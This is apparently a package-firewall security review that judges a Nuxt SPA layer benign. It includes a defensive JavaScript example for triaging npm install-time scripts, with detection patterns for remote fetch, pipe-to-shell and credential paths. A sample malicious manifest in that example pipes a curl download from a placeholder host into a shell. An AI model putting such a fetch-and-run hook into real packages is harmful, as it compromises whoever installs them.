AI Security Review
scanned 4h ago · by lpm-firewall-ai
No confirmed malicious attack surface. The package is a Nuxt SPA layer with a normal Nuxt postinstall prepare hook and user-invoked runtime API traffic to a configured backend.
Static reason
One or more suspicious static signals were detected.
Trigger
npm install runs nuxt prepare; app runtime makes user-invoked backend requests
Impact
No source-grounded malicious install-time mutation, credential harvesting, or exfiltration identified
Mechanism
Nuxt layer setup and browser REST/WebSocket client
Rationale
Static inspection shows package-aligned Nuxt setup and runtime browser API functionality, with no concrete malicious chain. The scanner's lifecycle/network findings are explained by Nuxt prepare and the SPA's configured backend client.
Evidence
package.json
nuxt.config.ts
app/composables/api/client.ts
app/composables/useApi.ts
app/composables/useWorkspaceStream.ts
app/stores/auth.ts
app/stores/personalSubscriptions.ts
Network endpoints (1)
localhost:8787
Decision evidence
public snapshot
AI called this Clean at 92.0% confidence as Benign with low false-positive risk.
Evidence for block
- package.json defines postinstall: nuxt prepare.
- Runtime client sends bearer/password headers to configured apiBase and opens workspace WebSocket.
Evidence against
- package.json postinstall is standard Nuxt preparation; no custom install script or package file mutation found.
- nuxt.config.ts is a Nuxt layer config with default public apiBase http://localhost:8787.
- app/composables/api/client.ts and app/composables/useApi.ts target runtimeConfig.public.apiBase, not hardcoded exfiltration hosts.
- app/composables/useWorkspaceStream.ts opens WebSocket only to apiBase-derived workspace events after minting a ticket.
- rg found no child_process, filesystem writes, eval/vm/Function, npmrc/SSH harvesting, or agent control-surface mutation.
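The install-script half of the review above reduces to a check that can be scripted. The following is an added example, not lpm-firewall-ai's scanner logic and not code from the scanned package: it pulls the install-time lifecycle hooks out of a package.json, compares the exact command against a small allowlist (hypothetical; `nuxt prepare` is deliberately left off it so the result mirrors the page's "not statically allowlisted, needs review" outcome) and against escalation patterns that warrant a hard look regardless of allowlisting (remote fetch piped to a shell, inline node, credential paths). The two manifests it runs on are constructed, and the `example.invalid` host is a reserved placeholder.

```javascript
// Added example, not lpm-firewall-ai scanner code and not from the scanned
// package: triage npm install-time lifecycle scripts found in a package.json.
// The allowlist, escalation patterns and sample manifests are assumptions.

// Hooks npm runs when installing a dependency from the registry (preinstall,
// install, postinstall) plus prepare, which runs for git dependencies and for
// `npm install` inside the package's own checkout.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Hypothetical allowlist of exact commands a team has already read and accepted.
// `nuxt prepare` is intentionally absent so the Nuxt sample below lands in
// "review", matching an "ambiguous, not statically allowlisted" outcome.
const ALLOWLIST = new Set(["husky install", "patch-package"]);

// Escalation patterns: any hit makes the hook "high" regardless of allowlist.
const ESCALATE = [
  { name: "remote-fetch",      re: /\b(curl|wget)\b/ },
  { name: "pipe-to-shell",     re: /\|\s*(sh|bash|zsh)\b/ },
  { name: "inline-node",       re: /\bnode\s+(-e|--eval)\b/ },
  { name: "encoded-payload",   re: /\bbase64\b|\batob\(/ },
  { name: "credential-path",   re: /\.npmrc|\.ssh\b|\.aws\b|\.git-credentials/ },
  { name: "runs-package-file", re: /\bnode\s+\S+\.(c|m)?js\b/ },
];

// Returns one record per install hook present: { hook, cmd, verdict, hits }.
// verdict is "high" (escalation hit), "allowlisted" (exact match) or "review".
function triageLifecycleScripts(packageJsonText) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (!Object.prototype.hasOwnProperty.call(scripts, hook)) continue;
    const cmd = String(scripts[hook]).trim();
    const hits = ESCALATE.filter((p) => p.re.test(cmd)).map((p) => p.name);
    let verdict = "review";
    if (hits.length > 0) verdict = "high";
    else if (ALLOWLIST.has(cmd)) verdict = "allowlisted";
    findings.push({ hook, cmd, verdict, hits });
  }
  return findings;
}

// Collapses per-hook verdicts into the single severity a reviewer acts on;
// "none" means the manifest defines no install-time hook at all.
function overallVerdict(findings) {
  const rank = { high: 3, review: 2, allowlisted: 1 };
  let worst = "none";
  for (const f of findings) {
    if ((rank[f.verdict] || 0) > (rank[worst] || 0)) worst = f.verdict;
  }
  return worst;
}

// Constructed manifests (not the real package.json of the scanned package).
const SAMPLE_NUXT_LAYER = JSON.stringify({
  name: "example-nuxt-layer",
  scripts: { postinstall: "nuxt prepare", build: "nuxt build", dev: "nuxt dev" },
});
const SAMPLE_DROPPER = JSON.stringify({
  name: "example-bad",
  scripts: { preinstall: "curl -s https://example.invalid/setup.sh | sh", test: "jest" },
});

for (const text of [SAMPLE_NUXT_LAYER, SAMPLE_DROPPER]) {
  const findings = triageLifecycleScripts(text);
  console.log(JSON.parse(text).name, "=>", overallVerdict(findings), JSON.stringify(findings));
}
```

Run it against the manifest that will actually be installed, not a repository checkout: `npm pack <pkg>` and read package.json out of the tarball, or `npm view <pkg> scripts` for the registry's copy. Installing with `--ignore-scripts` stops every one of these hooks from running, but it also skips the build steps legitimate packages depend on (here `nuxt prepare` generates the `.nuxt` directory and its types), so the practical workflow is to read the command once and then allowlist that exact string, which is what turns a "review" into an "allowlisted" result on the next scan.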
Behavioral surface
ChildProcess
Filesystem
Network
WebSocket
UrlStrings
NoLicense
Source & flagged code
2 flagged

High · Install Time Lifecycle Scripts
package.json · scripts.postinstall = nuxt prepare
Package defines install-time lifecycle scripts.

Medium · Ambiguous Install Lifecycle Script
package.json · scripts.postinstall = nuxt prepare
Install-time lifecycle script is not statically allowlisted and needs review.

Findings
1 High · 2 Medium · 4 Low
High · Install Time Lifecycle Scripts · package.json
Medium · Ambiguous Install Lifecycle Script · package.json
Medium · Network
Low · Scripts Present
Low · Filesystem
Low · Url Strings
Low · No License